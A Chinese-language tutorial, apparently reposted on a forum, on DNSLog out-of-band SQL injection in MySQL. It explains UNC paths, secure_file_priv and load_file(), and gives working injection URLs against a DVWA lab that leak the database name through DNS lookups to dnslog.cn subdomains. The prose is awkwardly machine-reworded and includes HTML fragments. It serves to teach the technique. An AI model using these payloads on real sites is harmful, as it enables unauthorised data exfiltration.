SQL注入-DNSLog注入
DNSLog注入DNSLog注入原理
在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高轻易被waf拦截,又大概是目的站点没有回显,我们在读取文件、执行命令注入等操作时无法明显简直认是否利用成功,这时间就要用到我们的DNSlog注入。
起首需要有一个可以设置的域名,比如:xxx.io,然后通过署理商设置域名 xxx.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上设置好 DNS Server,这样以来所有 xxx.io 及其子域名的查询都会到 服务器 A 上,这时就能够及时地监控域名查询哀求了。
https://i-blog.csdnimg.cn/blog_migrate/400707da051c2c6179b90623e9b67e14.png
DNS在剖析的时间会留下日志,咱们这个就是读取多级域名的剖析日志,来获取信息
简单来说就是把信息放在高级域名中,通报到自己这,然后读取日志,获取信息
UNC路径
格式:\servername\sharename,其中servername是服务器名。sharename是共享资源的名称。
目次或文件的UNC名称可以包罗共享名称下的目次路径,格式为:\servername\sharename\directory\filename。
其实我们寻常在Widnows中用共享文件的时间就会用到这种网络地址的情势
\sss.xxx\test
这也就解释了为什么CONCAT()函数拼接了4个\了,因为转义的缘故原由,4个就变\成了2个\,目的就是利用UNC路径。
比方:
http://dvwa/vulnerabilities/sqli_blind/?id=1' and (select load_file(concat('\\\\',(select database()),'.vlfrr9.dnslog.cn\\abc')))--+&Submit=Submit#
<ul class="pre-numbering"></ul> 这里concat函数拼接了4个\最后酿成2个\
推荐平台
http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io
<ul class="pre-numbering"></ul> sql注入利用
通过DNSlog盲注需要用的load_file()函数,所以一般得是root权限。show variables like ‘%secure%’;查看load_file()可以读取的磁盘。
1、当secure_file_priv为空,就可以读取磁盘的目次。
2、当secure_file_priv为G:\,就可以读取G盘的文件。
3、当secure_file_priv为null,load_file就不能加载文件。
如果为Null解决如下:
windows下:修改my.ini 在内加入secure_file_priv =
linux下:修改my.cnf 在内加入secure_file_priv =
如遇到MySql的盲注时,可以利用内置函数load_file()来完成DNSLOG。load_file()不但能够加载当地文件,同时也能对诸如\www.test.com这样的URL发起哀求。
show variables like '%secure%';
<ul class="pre-numbering"></ul> https://i-blog.csdnimg.cn/blog_migrate/abe58b217edcec1d3ef7985760733d59.png
通过设置my.ini来设置。secure_file_priv=""就是可以load_flie恣意磁盘的文件。
https://i-blog.csdnimg.cn/blog_migrate/4b0dd5ad850adc582d1d5b8f5f34ebe3.png
以管理员身份打开cmd重启后
net stop mysql
net start mysql
<ul class="pre-numbering"></ul> https://i-blog.csdnimg.cn/blog_migrate/fe8916ba704326923cb1d07c751a63b2.png
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1' and (select load_file(concat('\\\\',(select database()),'.fl1ka5.dnslog.cn\\abc')))--+&Submit=Submit#
<ul class="pre-numbering"></ul> https://i-blog.csdnimg.cn/blog_migrate/97e7995eb28bbc052e81cee3b59b748a.png
这里利用的是http://www.dnslog.cn/
点击Get SubDomain,将获取的dnslog更换掉,执行以后点击Refresh Record,这样就查询到了我们所需要的数据库名称。表名,字段名亦是如此。
https://i-blog.csdnimg.cn/blog_migrate/29aff936c898b7de2ae0d8994767bcf4.png
<div id="content_views" class="htmledit_views">
<p>这个漏洞不仅仅只是对<span style="color:#fe2c24;"><strong><span style="background-color:#f3f3f4;">SQL注入</span></strong></span>的利用,还是利用到<span style="color:#fe2c24;"><strong><span style="background-color:#f3f3f4;">load_file()</span></strong></span>这个<span class="edu-hl hl hl-1" data-report-click="{"spm":"1001.2101.3001.7020","extra":"{\"word\":\"函数\"}"}" data-tit="函数" data-pretit="函数">函数</span>解析<strong>DNS</strong>时带出的数据漏洞。</p>
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]